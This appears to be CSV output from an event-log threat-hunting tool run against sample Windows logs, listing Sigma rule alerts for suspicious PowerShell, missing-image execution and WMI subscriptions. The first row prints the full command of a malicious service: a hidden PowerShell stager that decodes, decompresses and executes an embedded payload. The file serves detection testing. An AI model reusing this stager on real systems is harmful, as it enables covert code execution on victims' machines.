2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 23:00:17.112 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:49:00.074 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:28:38.656 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 05:36:53.970 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 18:53:55.378 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-02 23:10:46.008 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:45:14.660 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:45:42.333 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:46:17.504 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:46:53.627 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:47:29.168 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:48:26.011 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
